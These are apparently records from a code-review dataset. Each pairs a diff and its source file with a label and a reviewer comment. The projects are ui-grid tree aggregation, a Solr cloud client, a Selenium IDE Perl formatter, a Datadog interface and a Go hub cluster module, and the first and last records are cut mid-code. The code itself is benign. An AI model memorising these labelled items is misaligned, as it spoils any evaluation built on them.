aggregation.col.treeAggregationFn(aggregation.col.treeFooterAggregation, fieldValue, numValue, row); } }); } }); }, // Aggregation routines - no doco needed as self evident nativeAggregations: function() { var nativeAggregations = { count: { label: i18nService.get().aggregation.count, menuTitle: i18nService.get().grouping.aggregate_count, aggregationFn: function (aggregation, fieldValue, numValue) { if (typeof(aggregation.value) === 'undefined') { aggregation.value = 1; } else { aggregation.value++; } } }, sum: { label: i18nService.get().aggregation.sum, menuTitle: i18nService.get().grouping.aggregate_sum, aggregationFn: function( aggregation, fieldValue, numValue ) { if 
(!isNaN(numValue)) { if (typeof(aggregation.value) === 'undefined') { aggregation.value = numValue; } else { aggregation.value += numValue; } } } }, min: { label: i18nService.get().aggregation.min, menuTitle: i18nService.get().grouping.aggregate_min, aggregationFn: function( aggregation, fieldValue, numValue ) { if (typeof(aggregation.value) === 'undefined') { aggregation.value = fieldValue; } else { if (typeof(fieldValue) !== 'undefined' && fieldValue !== null && (fieldValue < aggregation.value || aggregation.value === null)) { aggregation.value = fieldValue; } } } }, max: { label: i18nService.get().aggregation.max, menuTitle: i18nService.get().grouping.aggregate_max, aggregationFn: function( aggregation, fieldValue, numValue ){ if ( typeof(aggregation.value) === 'undefined' ){ aggregation.value = fieldValue; } else { if ( typeof(fieldValue) !== 'undefined' && fieldValue !== null && (fieldValue > aggregation.value || aggregation.value === null)){ aggregation.value = fieldValue; } } } }, avg: { label: i18nService.get().aggregation.avg, menuTitle: i18nService.get().grouping.aggregate_avg, aggregationFn: function( aggregation, fieldValue, numValue ){ if ( typeof(aggregation.count) === 'undefined' ){ aggregation.count = 1; } else { aggregation.count++; } if ( isNaN(numValue) ){ return; } if ( typeof(aggregation.value) === 'undefined' || typeof(aggregation.sum) === 'undefined' ){ aggregation.value = numValue; aggregation.sum = numValue; } else { aggregation.sum += numValue; aggregation.value = aggregation.sum / aggregation.count; } } } }; return nativeAggregations; }, /** * @ngdoc function * @name finaliseAggregation * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Helper function used to finalize aggregation nodes and footer cells * * @param {gridRow} row The parent we're finalising * @param {aggregation} aggregation The aggregation object manipulated by the aggregationFn */ finaliseAggregation: function(row, aggregation){ if ( aggregation.col.treeAggregationUpdateEntity && typeof(row) !== 'undefined' && typeof(row.entity[ '$$' + aggregation.col.uid ]) !== 'undefined' ){ angular.extend( aggregation, row.entity[ '$$' + aggregation.col.uid ]); } if ( typeof(aggregation.col.treeAggregationFinalizerFn) === 'function' ){ aggregation.col.treeAggregationFinalizerFn( aggregation ); } if ( typeof(aggregation.col.customTreeAggregationFinalizerFn) === 'function' ){ aggregation.col.customTreeAggregationFinalizerFn( aggregation ); } if ( typeof(aggregation.rendered) === 'undefined' ){ aggregation.rendered = aggregation.label ? aggregation.label + aggregation.value : aggregation.value; } }, /** * @ngdoc function * @name finaliseAggregations * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Format the data from the aggregation into the rendered text * e.g. if we had label: 'sum: ' and value: 25, we'd create 'sum: 25'. * * As part of this we call any formatting callback routines we've been provided. * * We write our aggregation out to the row.entity if treeAggregationUpdateEntity is * set on the column - we don't overwrite any information that's already there, we append * to it so that grouping can have set the groupVal beforehand without us overwriting it. 
* * We need to copy the data from the row.entity first before we finalise the aggregation, * we need that information for the finaliserFn * * @param {gridRow} row the parent we're finalising */ finaliseAggregations: function( row ){ if ( row == null || typeof(row.treeNode.aggregations) === 'undefined' ){ return; } row.treeNode.aggregations.forEach( function( aggregation ) { service.finaliseAggregation(row, aggregation); if ( aggregation.col.treeAggregationUpdateEntity ){ var aggregationCopy = {}; angular.forEach( aggregation, function( value, key ){ if ( aggregation.hasOwnProperty(key) && key !== 'col' ){ aggregationCopy[key] = value; } }); row.entity[ '$$' + aggregation.col.uid ] = aggregationCopy; } }); }, /** * @ngdoc function * @name treeFooterAggregationType * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Uses the tree aggregation functions and finalizers to set the * column footer aggregations. * * @param {rows} rows The visible rows. not used, but accepted to match signature of GridColumn.aggregationType * @param {GridColumn} column The column we are finalizing */ treeFooterAggregationType: function( rows, column ) { service.finaliseAggregation(undefined, column.treeFooterAggregation); if ( typeof(column.treeFooterAggregation.value) === 'undefined' || column.treeFooterAggregation.rendered === null ){ // The was apparently no aggregation performed (perhaps this is a grouped column return ''; } return column.treeFooterAggregation.rendered; } }; return service; }]); /** * @ngdoc directive * @name ui.grid.treeBase.directive:uiGridTreeRowHeaderButtons * @element div * * @description Provides the expand/collapse button on rows */ module.directive('uiGridTreeBaseRowHeaderButtons', ['$templateCache', 'uiGridTreeBaseService', function ($templateCache, uiGridTreeBaseService) { return { replace: true, restrict: 'E', template: $templateCache.get('ui-grid/treeBaseRowHeaderButtons'), scope: true, require: '^uiGrid', link: function($scope, $elm, $attrs, uiGridCtrl) { var self = uiGridCtrl.grid; $scope.treeButtonClick = function(row, evt) { evt.stopPropagation(); uiGridTreeBaseService.toggleRowTreeState(self, row, evt); }; } }; }]); /** * @ngdoc directive * @name ui.grid.treeBase.directive:uiGridTreeBaseExpandAllButtons * @element div * * @description Provides the expand/collapse all button */ module.directive('uiGridTreeBaseExpandAllButtons', ['$templateCache', 'uiGridTreeBaseService', function ($templateCache, uiGridTreeBaseService) { return { replace: true, restrict: 'E', template: $templateCache.get('ui-grid/treeBaseExpandAllButtons'), scope: false, link: function($scope, $elm, $attrs, uiGridCtrl) { var self = $scope.col.grid; $scope.headerButtonClick = function(row, evt) { if ( self.treeBase.expandAll ){ uiGridTreeBaseService.collapseAllRows(self, evt); } else { uiGridTreeBaseService.expandAllRows(self, evt); } }; } }; }]); /** * @ngdoc directive * @name ui.grid.treeBase.directive:uiGridViewport * @element div * * @description Stacks on top of ui.grid.uiGridViewport to set formatting on a tree header row */ module.directive('uiGridViewport', ['$compile', 'uiGridConstants', 'gridUtil', '$parse', function ($compile, uiGridConstants, gridUtil, $parse) { return { priority: -200, // run after default directive scope: false, compile: function ($elm, $attrs) { var rowRepeatDiv = angular.element($elm.children().children()[0]); var existingNgClass = rowRepeatDiv.attr("ng-class"); var newNgClass = ''; if ( existingNgClass ) { newNgClass = existingNgClass.slice(0, -1) + 
",'ui-grid-tree-header-row': row.treeLevel > -1}"; } else { newNgClass = "{'ui-grid-tree-header-row': row.treeLevel > -1}"; } rowRepeatDiv.attr("ng-class", newNgClass); return { pre: function ($scope, $elm, $attrs, controllers) { }, post: function ($scope, $elm, $attrs, controllers) { } }; } }; }]); })();
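The expand-state getter and setter documented at the head of this file lend themselves to a simple save/restore pattern. A minimal sketch, assuming the methods are registered under `gridApi.treeBase` as is usual for this feature; the module name, controller, column definitions and storage key below are illustrative assumptions, not part of the file above:

```js
// Sketch only: 'app', 'TreeCtrl' and the 'myTreeState' key are assumptions.
var app = angular.module('app', ['ui.grid', 'ui.grid.treeView']);

app.controller('TreeCtrl', ['$scope', function ($scope) {
  $scope.gridOptions = {
    columnDefs: [
      { name: 'name' },
      // 'sum' matches one of the native aggregation keys (count/sum/min/max/avg)
      { name: 'amount', treeAggregationType: 'sum' }
    ],
    onRegisterApi: function (gridApi) {
      // save the current expand/collapse state of every tree node
      $scope.saveTreeState = function () {
        var state = gridApi.treeBase.getTreeExpandedState();
        window.localStorage.setItem('myTreeState', JSON.stringify(state));
      };

      // restore a previously saved state; per the docs above, setTreeState
      // expects the config in the format produced by the get call
      $scope.restoreTreeState = function () {
        var saved = window.localStorage.getItem('myTreeState');
        if (saved) {
          gridApi.treeBase.setTreeState(JSON.parse(saved));
        }
      };
    }
  };
}]);
```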
1
11,995
Since I believe state will never be anything other than 'expanded' or 'collapsed', you can rewrite this as follows: `return row.treeNode.state === 'expanded' ? 'ui-grid-icon-minus-squared' : 'ui-grid-icon-plus-squared';`
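If that suggestion were adopted, it would presumably live in a small class helper on the row-header button scope; the `treeButtonClass` name below is hypothetical, only the ternary itself comes from the comment:

```js
// Hypothetical helper on the row-header button scope; returns the icon
// class for the expand/collapse button based on the node's state.
$scope.treeButtonClass = function (row) {
  return row.treeNode.state === 'expanded'
    ? 'ui-grid-icon-minus-squared'
    : 'ui-grid-icon-plus-squared';
};
```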
angular-ui-ui-grid
js
@@ -32,10 +32,6 @@ import org.apache.solr.common.SolrException; * Solr endpoints for SolrCloud collections, and then use the * {@link LBHttp2SolrClient} to issue requests. * - * This class assumes the id field for your documents is called - * 'id' - if this is not the case, you must set the right name - * with {@link #setIdField(String)}. - * * @lucene.experimental * @since solr 8.0 */
1
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.solr.client.solrj.impl; import java.io.IOException; import java.util.ArrayList; import java.util.Collection; import java.util.List; import java.util.Optional; import org.apache.solr.client.solrj.request.UpdateRequest; import org.apache.solr.common.SolrException; /** * SolrJ client class to communicate with SolrCloud using Http2SolrClient. * Instances of this class communicate with Zookeeper to discover * Solr endpoints for SolrCloud collections, and then use the * {@link LBHttp2SolrClient} to issue requests. * * This class assumes the id field for your documents is called * 'id' - if this is not the case, you must set the right name * with {@link #setIdField(String)}. * * @lucene.experimental * @since solr 8.0 */ @SuppressWarnings("serial") public class CloudHttp2SolrClient extends BaseCloudSolrClient { private final ClusterStateProvider stateProvider; private final LBHttp2SolrClient lbClient; private Http2SolrClient myClient; private final boolean clientIsInternal; /** * Create a new client object that connects to Zookeeper and is always aware * of the SolrCloud state. If there is a fully redundant Zookeeper quorum and * SolrCloud has enough replicas for every shard in a collection, there is no * single point of failure. Updates will be sent to shard leaders by default. * * @param builder a {@link Http2SolrClient.Builder} with the options used to create the client. */ protected CloudHttp2SolrClient(Builder builder) { super(builder.shardLeadersOnly, builder.parallelUpdates, builder.directUpdatesToLeadersOnly); this.clientIsInternal = builder.httpClient == null; this.myClient = (builder.httpClient == null) ? new Http2SolrClient.Builder().build() : builder.httpClient; if (builder.stateProvider == null) { if (builder.zkHosts != null && builder.solrUrls != null) { throw new IllegalArgumentException("Both zkHost(s) & solrUrl(s) have been specified. 
Only specify one."); } if (builder.zkHosts != null) { this.stateProvider = new ZkClientClusterStateProvider(builder.zkHosts, builder.zkChroot); } else if (builder.solrUrls != null && !builder.solrUrls.isEmpty()) { try { this.stateProvider = new Http2ClusterStateProvider(builder.solrUrls, builder.httpClient); } catch (Exception e) { throw new RuntimeException("Couldn't initialize a HttpClusterStateProvider (is/are the " + "Solr server(s), " + builder.solrUrls + ", down?)", e); } } else { throw new IllegalArgumentException("Both zkHosts and solrUrl cannot be null."); } } else { this.stateProvider = builder.stateProvider; } this.lbClient = new LBHttp2SolrClient(myClient); } @Override public void close() throws IOException { stateProvider.close(); lbClient.close(); if (clientIsInternal && myClient!=null) { myClient.close(); } super.close(); } public LBHttp2SolrClient getLbClient() { return lbClient; } @Override public ClusterStateProvider getClusterStateProvider() { return stateProvider; } public Http2SolrClient getHttpClient() { return myClient; } @Override protected boolean wasCommError(Throwable rootCause) { return false; } /** * Constructs {@link CloudHttp2SolrClient} instances from provided configuration. */ public static class Builder { protected Collection<String> zkHosts = new ArrayList<>(); protected List<String> solrUrls = new ArrayList<>(); protected String zkChroot; protected Http2SolrClient httpClient; protected boolean shardLeadersOnly = true; protected boolean directUpdatesToLeadersOnly = false; protected boolean parallelUpdates = true; protected ClusterStateProvider stateProvider; /** * Provide a series of Solr URLs to be used when configuring {@link CloudHttp2SolrClient} instances. * The solr client will use these urls to understand the cluster topology, which solr nodes are active etc. * * Provided Solr URLs are expected to point to the root Solr path ("http://hostname:8983/solr"); they should not * include any collections, cores, or other path components. * * Usage example: * * <pre> * final List&lt;String&gt; solrBaseUrls = new ArrayList&lt;String&gt;(); * solrBaseUrls.add("http://solr1:8983/solr"); solrBaseUrls.add("http://solr2:8983/solr"); solrBaseUrls.add("http://solr3:8983/solr"); * final SolrClient client = new CloudHttp2SolrClient.Builder(solrBaseUrls).build(); * </pre> */ public Builder(List<String> solrUrls) { this.solrUrls = solrUrls; } /** * Provide a series of ZK hosts which will be used when configuring {@link CloudHttp2SolrClient} instances. * * Usage example when Solr stores data at the ZooKeeper root ('/'): * * <pre> * final List&lt;String&gt; zkServers = new ArrayList&lt;String&gt;(); * zkServers.add("zookeeper1:2181"); zkServers.add("zookeeper2:2181"); zkServers.add("zookeeper3:2181"); * final SolrClient client = new CloudHttp2SolrClient.Builder(zkServers, Optional.empty()).build(); * </pre> * * Usage example when Solr data is stored in a ZooKeeper chroot: * * <pre> * final List&lt;String&gt; zkServers = new ArrayList&lt;String&gt;(); * zkServers.add("zookeeper1:2181"); zkServers.add("zookeeper2:2181"); zkServers.add("zookeeper3:2181"); * final SolrClient client = new CloudHttp2SolrClient.Builder(zkServers, Optional.of("/solr")).build(); * </pre> * * @param zkHosts a List of at least one ZooKeeper host and port (e.g. "zookeeper1:2181") * @param zkChroot the path to the root ZooKeeper node containing Solr data. Provide {@code java.util.Optional.empty()} if no ZK chroot is used. 
*/ public Builder(List<String> zkHosts, Optional<String> zkChroot) { this.zkHosts = zkHosts; if (zkChroot.isPresent()) this.zkChroot = zkChroot.get(); } /** * Tells {@link CloudHttp2SolrClient.Builder} that created clients should send direct updates to shard leaders only. * * UpdateRequests whose leaders cannot be found will "fail fast" on the client side with a {@link SolrException} */ public Builder sendDirectUpdatesToShardLeadersOnly() { directUpdatesToLeadersOnly = true; return this; } /** * Tells {@link CloudHttp2SolrClient.Builder} that created clients can send updates to any shard replica (shard leaders and non-leaders). * * Shard leaders are still preferred, but the created clients will fallback to using other replicas if a leader * cannot be found. */ public Builder sendDirectUpdatesToAnyShardReplica() { directUpdatesToLeadersOnly = false; return this; } /** * Tells {@link CloudHttp2SolrClient.Builder} whether created clients should send shard updates serially or in parallel * * When an {@link UpdateRequest} affects multiple shards, {@link CloudHttp2SolrClient} splits it up and sends a request * to each affected shard. This setting chooses whether those sub-requests are sent serially or in parallel. * <p> * If not set, this defaults to 'true' and sends sub-requests in parallel. */ public Builder withParallelUpdates(boolean parallelUpdates) { this.parallelUpdates = parallelUpdates; return this; } public Builder withHttpClient(Http2SolrClient httpClient) { this.httpClient = httpClient; return this; } /** * Create a {@link CloudHttp2SolrClient} based on the provided configuration. */ public CloudHttp2SolrClient build() { if (stateProvider == null) { if (!zkHosts.isEmpty()) { stateProvider = new ZkClientClusterStateProvider(zkHosts, zkChroot); } else if (!this.solrUrls.isEmpty()) { try { stateProvider = new Http2ClusterStateProvider(solrUrls, httpClient); } catch (Exception e) { throw new RuntimeException("Couldn't initialize a HttpClusterStateProvider (is/are the " + "Solr server(s), " + solrUrls + ", down?)", e); } } else { throw new IllegalArgumentException("Both zkHosts and solrUrl cannot be null."); } } return new CloudHttp2SolrClient(this); } } }
1
40,703
The latter part can go, but isn't the first part of this still sound -- that we assume "id"?
apache-lucene-solr
java
@@ -27,14 +27,12 @@ var formatter = this; string = function(value) { if (value != null) { value = value.replace(/\\/g, '\\\\'); - value = value.replace(/\"/g, '\\"'); + value = value.replace(/\'/g, '\\\''); value = value.replace(/\r/g, '\\r'); value = value.replace(/\n/g, '\\n'); - value = value.replace(/@/g, '\\@'); - value = value.replace(/\$/g, '\\$'); - return '"' + value + '"'; + return '\'' + value + '\''; } else { - return '""'; + return '\'\''; } }
1
/* * Format for Selenium Remote Control Perl client. */ var subScriptLoader = Components.classes["@mozilla.org/moz/jssubscript-loader;1"].getService(Components.interfaces.mozIJSSubScriptLoader); subScriptLoader.loadSubScript('chrome://selenium-ide/content/formats/remoteControl.js', this); this.name = "perl-rc"; // method name will not be used in this format function testMethodName(testName) { return testName; } var originalFormatCommands = formatCommands; formatCommands = function(commands) { this.tests = 0; var lines = originalFormatCommands(commands); if (this.tests == 0) { lines += addIndent("pass;\n"); } return lines; } var formatter = this; string = function(value) { if (value != null) { value = value.replace(/\\/g, '\\\\'); value = value.replace(/\"/g, '\\"'); value = value.replace(/\r/g, '\\r'); value = value.replace(/\n/g, '\\n'); value = value.replace(/@/g, '\\@'); value = value.replace(/\$/g, '\\$'); return '"' + value + '"'; } else { return '""'; } } variableName = function(value) { return "$" + value; } concatString = function(array) { return array.join(" . "); } function assertTrue(expression) { if (formatter.assertOrVerifyFailureOnNext) { return expression.toString() + " or die;"; } else { formatter.tests++; if (expression.assertable) { expression.suffix = "_ok"; return expression.toString() + ";"; } else { return "ok(" + expression.toString() + ");"; } } } function assertFalse(expression) { if (formatter.assertOrVerifyFailureOnNext) { return expression.toString() + " and die;"; } else { formatter.tests++; return "ok(not " + expression.toString() + ");"; } } var verifyTrue = assertTrue; var verifyFalse = assertFalse; function joinExpression(expression) { return "join(',', " + expression.toString() + ")"; } function assignToVariable(type, variable, expression) { if (type == 'String[]') { return "my @" + variable + " = " + expression.toString(); } else { return "my $" + variable + " = " + expression.toString(); } } function waitFor(expression) { return "WAIT: {\n" + indents(1) + "for (1..60) {\n" + indents(2) + "if (eval { " + expression.toString() + " }) { pass; last WAIT }\n" + indents(2) + "sleep(1);\n" + indents(1) + "}\n" + indents(1) + 'fail("timeout");\n' + "}"; } function assertOrVerifyFailure(line, isAssert) { return 'dies_ok { ' + line + ' };'; } Equals.prototype.toString = function() { return this.e1.toString() + " eq " + this.e2.toString(); } NotEquals.prototype.toString = function() { return this.e1.toString() + " ne " + this.e2.toString(); } Equals.prototype.assert = function() { if (formatter.assertOrVerifyFailureOnNext) { return assertTrue(this); } else { formatter.tests++; if (!this.e2.args) { return "is(" + this.e1 + ", " + this.e2 + ");"; } else { var expression = this.e2; expression.suffix = "_is"; expression.noGet = true; expression.args.push(this.e1); return expression.toString() + ";"; } } } Equals.prototype.verify = Equals.prototype.assert; NotEquals.prototype.assert = function() { if (formatter.assertOrVerifyFailureOnNext) { return assertTrue(this); } else { if (!this.e2.args) { return "isnt(" + this.e1 + ", " + this.e2 + ");"; } else { formatter.tests++; var expression = this.e2; expression.suffix = "_isnt"; expression.noGet = true; expression.args.push(this.e1); return expression.toString() + ";"; } } } NotEquals.prototype.verify = NotEquals.prototype.assert; RegexpMatch.prototype.toString = function() { return this.expression + " =~ /" + this.pattern.replace(/\//g, "\\/") + "/"; } RegexpNotMatch.prototype.toString = function() { return notOperator() 
+ "(" + RegexpMatch.prototype.toString.call(this) + ")"; } function ifCondition(expression, callback) { return "if (" + expression.toString() + ") {\n" + callback() + "}"; } function pause(milliseconds) { return "sleep(" + (parseInt(milliseconds) / 1000) + ");"; } function echo(message) { return "print(" + xlateArgument(message) + ' . "\\n");' } function statement(expression) { if (!formatter.assertOrVerifyFailureOnNext) { formatter.tests++; expression.suffix = "_ok"; } return expression.toString() + ";"; } function array(value) { var str = '('; for (var i = 0; i < value.length; i++) { str += string(value[i]); if (i < value.length - 1) str += ", "; } str += ')'; return str; } function nonBreakingSpace() { return "\"\\x{00A0}\""; } CallSelenium.prototype.assertable = true; CallSelenium.prototype.toString = function() { var result = ''; if (this.negative) { result += '!'; } if (options.receiver) { result += options.receiver + '->'; } var command = underscore(this.message); if (this.noGet) { command = command.replace(/^get_/, ''); } result += command; if (this.suffix) { result += this.suffix; } result += '('; for (var i = 0; i < this.args.length; i++) { result += this.args[i]; if (i < this.args.length - 1) { result += ', '; } } result += ')'; return result; } function formatComment(comment) { return comment.comment.replace(/.+/mg, function(str) { return "# " + str; }); } this.options = { receiver: "$sel", rcHost: "localhost", rcPort: "4444", environment: "*chrome", header: 'use strict;\n' + 'use warnings;\n' + 'use Time::HiRes qw(sleep);\n' + 'use Test::WWW::Selenium;\n' + 'use Test::More "no_plan";\n' + 'use Test::Exception;\n' + '\n' + 'my ${receiver} = Test::WWW::Selenium->new( host => "${rcHost}", \n' + ' port => ${rcPort}, \n' + ' browser => "${environment}", \n' + ' browser_url => "${baseURL}" );\n' + '\n', footer: "", indent: "4", initialIndents: '0' }; this.configForm = '<description>Variable for Selenium instance</description>' + '<textbox id="options_receiver" />' + '<description>Selenium RC host</description>' + '<textbox id="options_rcHost" />' + '<description>Selenium RC port</description>' + '<textbox id="options_rcPort" />' + '<description>Environment</description>' + '<textbox id="options_environment" />' + '<description>Header</description>' + '<textbox id="options_header" multiline="true" flex="1" rows="4"/>' + '<description>Footer</description>' + '<textbox id="options_footer" multiline="true" flex="1" rows="4"/>' + '<description>Indent</description>' + '<menulist id="options_indent"><menupopup>' + '<menuitem label="Tab" value="tab"/>' + '<menuitem label="1 space" value="1"/>' + '<menuitem label="2 spaces" value="2"/>' + '<menuitem label="3 spaces" value="3"/>' + '<menuitem label="4 spaces" value="4"/>' + '<menuitem label="5 spaces" value="5"/>' + '<menuitem label="6 spaces" value="6"/>' + '<menuitem label="7 spaces" value="7"/>' + '<menuitem label="8 spaces" value="8"/>' + '</menupopup></menulist>';
1
10,815
Why is the escaping of @ and $ removed?
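For context on the question: Perl interpolates `$` and `@` inside double-quoted strings but not inside single-quoted ones, so once the formatter emits single-quoted literals those two escapes become unnecessary. A standalone sketch contrasting the two strategies (illustration only, not the formatter code; note that Perl also does not process `\r`/`\n` escapes inside single quotes):

```js
// Old behaviour: emit a Perl double-quoted literal, so $ and @ must be
// escaped to stop Perl from interpolating variables into the string.
function toPerlDoubleQuoted(value) {
  value = value.replace(/\\/g, '\\\\')
               .replace(/"/g, '\\"')
               .replace(/\r/g, '\\r')
               .replace(/\n/g, '\\n')
               .replace(/@/g, '\\@')
               .replace(/\$/g, '\\$');
  return '"' + value + '"';
}

// Patched behaviour: emit a Perl single-quoted literal; $ and @ are inert
// there, so only backslash and the quote character strictly need escaping.
function toPerlSingleQuoted(value) {
  value = value.replace(/\\/g, '\\\\')
               .replace(/'/g, "\\'")
               .replace(/\r/g, '\\r')
               .replace(/\n/g, '\\n');
  return "'" + value + "'";
}

toPerlDoubleQuoted('price is $10 @ checkout'); // "price is \$10 \@ checkout"
toPerlSingleQuoted('price is $10 @ checkout'); // 'price is $10 @ checkout'
```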
SeleniumHQ-selenium
rb
@@ -0,0 +1,7 @@ +namespace Datadog.Trace.ClrProfiler.Interfaces +{ + internal interface IHasHttpUrl + { + string GetRawUrl(); + } +}
1
1
14,649
Nit: `Http` is redundant in this interface's name.
DataDog-dd-trace-dotnet
.cs
@@ -82,6 +82,19 @@ func NewCluster(ctx context.Context, cfg *ClusterConfig, creds credentials.Trans if err != nil { return nil, nil, err } + + exists, err := store.Exists(cfg.SynchronizableEntitiesPrefix) + if err != nil { + return nil, nil, fmt.Errorf("failed to check if SynchronizableEntitiesPrefix exists: %s", err) + } + + if !exists { + err = store.Put(cfg.SynchronizableEntitiesPrefix, []byte{}, nil) + if err != nil { + return nil, nil, err + } + } + endpoints, err := parseEndpoints(cfg) if err != nil { return nil, nil, err
1
package hub import ( "bytes" "context" "crypto/tls" "encoding/json" "fmt" "net" "reflect" "strings" "sync" "time" "github.com/docker/leadership" "github.com/docker/libkv" "github.com/docker/libkv/store" "github.com/docker/libkv/store/boltdb" "github.com/docker/libkv/store/consul" log "github.com/noxiouz/zapctx/ctxlog" "github.com/pkg/errors" "github.com/satori/uuid" pb "github.com/sonm-io/core/proto" "github.com/sonm-io/core/util" "go.uber.org/zap" "golang.org/x/sync/errgroup" "google.golang.org/grpc" "google.golang.org/grpc/credentials" ) // ClusterEvent describes an event that can produce the cluster. // // Possible types are: // - `NewMemberEvent` when new member joins cluster // - `LeadershipEvent` when leadership is transferred // - `T` types for other registered synchronizable entities. // - `error` on any unrecoverable error, after that channel is closed // and the user should call Run once more to enable synchronization type ClusterEvent interface{} // Specific type of cluster event emited when new member joins cluster type NewMemberEvent struct { Id string endpoints []string } // Specific type of cluster event emited when leadership is transferred. // It is not always loss or aquire of leadership of this specific node type LeadershipEvent struct { Held bool LeaderId string LeaderEndpoints []string } type Cluster interface { // Starts synchronization process. Can be called multiple times after error is received in EventChannel Run() error Close() // IsLeader returns true if this cluster is a leader, i.e. we rule the // synchronization process. IsLeader() bool LeaderClient() (pb.HubClient, error) RegisterAndLoadEntity(name string, prototype interface{}) error Synchronize(entity interface{}) error // Fetch current cluster members Members() ([]NewMemberEvent, error) } // Returns a cluster writer interface if this node is a master, event channel // otherwise. // Should be recalled when a cluster's master/slave state changes. // The channel is closed when the specified context is canceled. 
func NewCluster(ctx context.Context, cfg *ClusterConfig, creds credentials.TransportCredentials) (Cluster, <-chan ClusterEvent, error) { store, err := makeStore(ctx, cfg) if err != nil { return nil, nil, err } endpoints, err := parseEndpoints(cfg) if err != nil { return nil, nil, err } c := cluster{ parentCtx: ctx, cfg: cfg, registeredEntities: make(map[string]reflect.Type), entityNames: make(map[reflect.Type]string), store: store, isLeader: true, id: uuid.NewV1().String(), endpoints: endpoints, clients: make(map[string]*client), clusterEndpoints: make(map[string][]string), eventChannel: make(chan ClusterEvent, 100), creds: creds, } if cfg.Failover { c.isLeader = false } c.ctx, c.cancel = context.WithCancel(c.parentCtx) c.registerMember(c.id, c.endpoints) return &c, c.eventChannel, nil } type client struct { client pb.HubClient conn *grpc.ClientConn } type cluster struct { parentCtx context.Context ctx context.Context cancel context.CancelFunc cfg *ClusterConfig registeredEntitiesMu sync.RWMutex registeredEntities map[string]reflect.Type entityNames map[reflect.Type]string store store.Store // self info isLeader bool id string endpoints []string leaderLock sync.RWMutex clients map[string]*client clusterEndpoints map[string][]string leaderId string eventChannel chan ClusterEvent creds credentials.TransportCredentials } func (c *cluster) Close() { if c.cancel != nil { c.cancel() } } func (c *cluster) Run() error { c.Close() w := errgroup.Group{} c.ctx, c.cancel = context.WithCancel(c.parentCtx) if c.cfg.Failover { c.isLeader = false w.Go(c.election) w.Go(c.leaderWatch) w.Go(c.announce) w.Go(c.hubWatch) w.Go(c.hubGC) } else { log.G(c.ctx).Info("runnning in dev single-server mode") } w.Go(c.watchEvents) return w.Wait() } func (c *cluster) IsLeader() bool { return c.isLeader } // Get GRPC hub client to current leader func (c *cluster) LeaderClient() (pb.HubClient, error) { log.G(c.ctx).Debug("fetching leader client") c.leaderLock.RLock() defer c.leaderLock.RUnlock() leaderEndpoints, ok := c.clusterEndpoints[c.leaderId] if !ok || len(leaderEndpoints) == 0 { log.G(c.ctx).Warn("can not determine leader") return nil, errors.New("can not determine leader") } client, ok := c.clients[c.leaderId] if !ok || client == nil { log.G(c.ctx).Warn("not connected to leader") return nil, errors.New("not connected to leader") } return client.client, nil } func (c *cluster) RegisterAndLoadEntity(name string, prototype interface{}) error { c.registeredEntitiesMu.Lock() defer c.registeredEntitiesMu.Unlock() t := reflect.Indirect(reflect.ValueOf(prototype)).Type() c.registeredEntities[name] = t c.entityNames[t] = name keyName := c.cfg.SynchronizableEntitiesPrefix + "/" + name exists, err := c.store.Exists(keyName) if err != nil { return errors.Wrap(err, fmt.Sprintf("could not check entity %s for existance in storage", name)) } if !exists { return nil } kvPair, err := c.store.Get(keyName) if err != nil { return errors.Wrap(err, fmt.Sprintf("could not fetch entity %s initial value from storage", name)) } err = json.Unmarshal(kvPair.Value, prototype) if err != nil { return errors.Wrap(err, fmt.Sprintf("could not unmarshal entity %s from storage data", name)) } return nil } func (c *cluster) Synchronize(entity interface{}) error { if !c.isLeader { log.G(c.ctx).Warn("failed to synchronize entity - not a leader") return errors.New("not a leader") } name, err := c.nameByEntity(entity) if err != nil { log.G(c.ctx).Warn("unknown synchronizable entity", zap.Any("entity", entity)) return err } data, err := json.Marshal(entity) 
if err != nil { log.G(c.ctx).Warn("could not marshal entity", zap.Error(err)) return err } log.G(c.ctx).Debug("synchronizing entity", zap.Any("entity", entity), zap.ByteString("marshalled", data)) c.store.Put(c.cfg.SynchronizableEntitiesPrefix+"/"+name, data, &store.WriteOptions{}) return nil } func (c *cluster) Members() ([]NewMemberEvent, error) { result := make([]NewMemberEvent, 0) c.leaderLock.RLock() defer c.leaderLock.RUnlock() for id, endpoints := range c.clusterEndpoints { result = append(result, NewMemberEvent{id, endpoints}) } return result, nil } func (c *cluster) election() error { candidate := leadership.NewCandidate(c.store, c.cfg.LeaderKey, c.id, makeDuration(c.cfg.LeaderTTL)) electedCh, errCh := candidate.RunForElection() log.G(c.ctx).Info("starting leader election goroutine") for { select { case c.isLeader = <-electedCh: log.G(c.ctx).Debug("election event", zap.Bool("isLeader", c.isLeader)) // Do not possibly block on event channel to prevent stale leadership data go c.emitLeadershipEvent() case err := <-errCh: log.G(c.ctx).Error("election failure", zap.Error(err)) c.close(errors.WithStack(err)) return err case <-c.ctx.Done(): candidate.Stop() return nil } } } // Blocks in endless cycle watching for leadership. // When the leadership is changed stores new leader id in cluster func (c *cluster) leaderWatch() error { log.G(c.ctx).Info("starting leader watch goroutine") follower := leadership.NewFollower(c.store, c.cfg.LeaderKey) leaderCh, errCh := follower.FollowElection() for { select { case <-c.ctx.Done(): follower.Stop() return nil case err := <-errCh: log.G(c.ctx).Error("leader watch failure", zap.Error(err)) c.close(errors.WithStack(err)) return err case leaderId := <-leaderCh: c.leaderLock.Lock() c.leaderId = leaderId c.leaderLock.Unlock() c.emitLeadershipEvent() } } } func (c *cluster) announce() error { log.G(c.ctx).Info("starting announce goroutine", zap.Any("endpoints", c.endpoints), zap.String("ID", c.id)) endpointsData, _ := json.Marshal(c.endpoints) ticker := time.NewTicker(makeDuration(c.cfg.AnnounceTTL)) defer ticker.Stop() for { select { case <-ticker.C: err := c.store.Put(c.cfg.MemberListKey+"/"+c.id, endpointsData, &store.WriteOptions{TTL: makeDuration(c.cfg.AnnounceTTL)}) if err != nil { log.G(c.ctx).Error("could not update announce", 